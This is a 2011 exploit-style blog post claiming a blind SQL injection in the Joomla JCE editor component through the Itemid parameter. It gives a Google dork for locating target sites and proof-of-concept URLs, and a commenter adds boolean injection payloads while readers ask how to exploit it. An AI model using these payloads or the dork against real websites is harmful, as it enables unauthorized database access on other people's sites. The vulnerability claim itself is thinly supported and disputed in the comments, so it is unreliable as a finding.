2011/04/08

joomlacontenteditor (com_jce) BLIND sql injection vulnerability

===================================================================
joomlacontenteditor (com_jce) BLIND sql injection vulnerability
===================================================================

Software: joomlacontenteditor (com_jce)
Vendor: www.joomlacontenteditor.net
Vuln Type: BLind SQL Injection
Download link: http://www.joomlacontenteditor.net/downloads/editor/joomla15x/category/joomla-15-2 (check here)
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
Dork: inurl:"/index.php?option=com_jce"

===================================================================

Description:

JCE makes creating and editing Joomla!®
content easy Add a set of tools to your Joomla!® environment that give you the power to create the kind of content you want,
without limitations, and without needing to know or learn HTML, XHTML, CSS...

===================================================================

exploit & p0c

[!] index.php?option=com_jce&Itemid=[valid Itemid]

Example p0c

[!] http://host/index.php?option=com_jce&Itemid=8 <= True
[!] http://host/index.php?option=com_jce&Itemid=-8 <= False


====================================================================

Nothing Impossible In This World Even Nobody`s Perfect

===================================================================

==========================| -=[ E0F ]=- |==========================

4 comments:

  1. so what the added too can be exploit it??

    ReplyDelete
  2. I mean how can I exploite this lacuna ??

    ReplyDelete
  3. so what? it is bullshit, not bug

    ReplyDelete
  4. even so...
    index.php?option=com_jce&Itemid=(null)or(if(1),61,null) - true
    index.php?option=com_jce&Itemid=(null)or(if(0),61,null) - false
    but....

    ReplyDelete